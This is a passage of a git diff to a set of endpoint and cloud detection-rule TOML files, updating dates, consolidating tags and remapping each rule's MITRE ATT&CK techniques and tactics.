"Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -108,10 +100,12 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -122,37 +116,17 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index 884c457808b..a27af3e29e5 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Potential Masquerading as System32 Executable" risk_score = 21 rule_id = "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -82,10 +74,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -96,22 +90,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index eb6a59b0199..ee7da379d9e 100644 --- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -31,18 +31,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Purview", - "Use Case: Threat Detection", - "Use Case: Configuration Auditing", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Purview", "Use Case: Threat Detection", "Use Case: Configuration Auditing", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -54,30 +43,54 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 6c94369c5a7..51ce78a36d2 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -27,16 +27,7 @@ references = ["https://irsl.medium.com/the-trouble-with-microsofts-troubleshoote risk_score = 21 rule_id = "808291d3-e918-4a3a-86cd-73052a0c9bdc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -59,14 +50,31 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml index a081138d5d5..1c1aa8ae3d2 100644 --- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml +++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Suspicious Outlook Child Process" risk_score = 21 rule_id = "6cf17149-a8e3-44ec-9ec9-fdc8535547a1" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -72,41 +64,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml index 88639b9b669..05aa2a61ba6 100644 --- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml +++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -174,39 +174,21 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml index c008bcb22fd..f38adcbf777 100644 --- a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml +++ b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -143,39 +143,21 @@ value = "?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Se [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml index c1f1d49dab7..cc41fc4c9ba 100644 --- a/rules_building_block/defense_evasion_service_disabled_registry.toml +++ b/rules_building_block/defense_evasion_service_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,26 +48,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index 9eb28e15955..f2d9b61fb4e 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,16 +20,7 @@ name = "Service Path Modification" risk_score = 21 rule_id = "f243fe39-83a4-46f3-a3b6-707557a102df" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -51,48 +42,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index 5a13a3271d6..f8c032bc23e 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,17 +26,7 @@ name = "Service Path Modification via sc.exe" risk_score = 21 rule_id = "c5677997-f75b-4cda-b830-a75920514096" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -48,48 +38,36 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/defense_evasion_unsigned_bits_client.toml b/rules_building_block/defense_evasion_unsigned_bits_client.toml index 84012c3b2d4..7d83ae84a7f 100644 --- a/rules_building_block/defense_evasion_unsigned_bits_client.toml +++ b/rules_building_block/defense_evasion_unsigned_bits_client.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,24 +44,13 @@ not process.code_signature.status : ("errorExpired", "errorCode_endpoint*") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml index ca738169f21..ad7ea692da9 100644 --- a/rules_building_block/defense_evasion_write_dac_access.toml +++ b/rules_building_block/defense_evasion_write_dac_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -42,16 +42,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Rule Type: BBR", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Rule Type: BBR", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "query" @@ -63,19 +54,26 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1222.001" -name = "Windows File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/001/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml index 66cd382d8ff..fc509abd200 100644 --- a/rules_building_block/discovery_capnetraw_capability.toml +++ b/rules_building_block/discovery_capnetraw_capability.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2024/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" @@ -74,11 +67,23 @@ id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml index eb8dadcd502..ce6ec481af5 100644 --- a/rules_building_block/discovery_generic_account_groups.toml +++ b/rules_building_block/discovery_generic_account_groups.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,10 +64,17 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" @@ -78,11 +85,11 @@ id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -93,15 +100,12 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml index 981adb13784..a7bc9dae1fb 100644 --- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml +++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/12" integration = ["auditd_manager"] maturity = "production" -updated_date = "2024/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml index 3df1dd8bd91..68e6f743fc7 100644 --- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml +++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,16 +59,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml index eee45ca1da0..1dec0fd05c4 100644 --- a/rules_building_block/discovery_linux_modprobe_enumeration.toml +++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,13 +44,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = [ - "Data Source: Auditd Manager", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", -] +tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" @@ -73,15 +67,37 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml index 